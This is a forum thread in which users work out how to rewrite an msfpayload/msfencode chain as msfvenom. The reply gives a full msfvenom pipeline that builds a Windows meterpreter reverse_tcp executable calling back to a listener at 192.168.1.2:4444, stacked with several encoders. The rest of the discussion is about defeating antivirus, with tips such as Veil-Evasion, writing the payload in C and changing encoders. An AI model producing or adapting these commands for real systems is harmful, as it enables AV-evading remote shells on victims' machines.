Forum Thread: Msfvenom Help?

i want to transfer this command from msfpayload and msfencode to msfvenom

msfpayload windows/meterpreter/reversetcp LHOST=ip LPORT=port

R | msfencode -e x86/shitakaganai -c 5 -t raw | msfencode -e x86/alphaupper -c 2 -t raw | msfencode -e x86/shitakaganai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe > text.exe

i try alot of things but didn't work
i want to know how to use different encoders in msfvenom like the command above.

12 Responses

Have you read my msfvenom tutorial?

i don't know i read tutorial here about msfvenom but didn't explain this point
can you sir give my your tutorial please ?
sorry for my bad language

yes the tutorial i read here was your tutorial but you sir don't explain how to use different encoders what i want : i want to encode a payload with x86/shitakaganai encoder then encode the result with x86/alphaupper

Just type msfvenom in console... it will give you the required extensions to use!!
Or maybe its msfvenom -h or msfvenom -help.... try em...
;);P

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -e x86/alpha_upper -i 2 -f raw | msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -p - -a x86 --platform win -e x86/countdown -i 5 -f exe > /root/Desktop/test.exe

Yea p for payload.. e for encoding... I for iterations.. lhost and lport...f for framework!! ;);)

Thank you, I was to lazy to post an explanation rather than just the command. Still gets caught by AV anyways.

Even after iterations ?? Yea maybe...
Try veilevasion

thank you very much guys
yea still gets caught by av even after iterations
but i want to know the way only and that was helpful
play with encoders and iterations until the av cann't caught it

Or try veilevasion... write code in c

i try veilevasion with python and av caught it

Try c and use something except shikagienkata with 47 iterations

Share Your Thoughts

• Hot
  • Active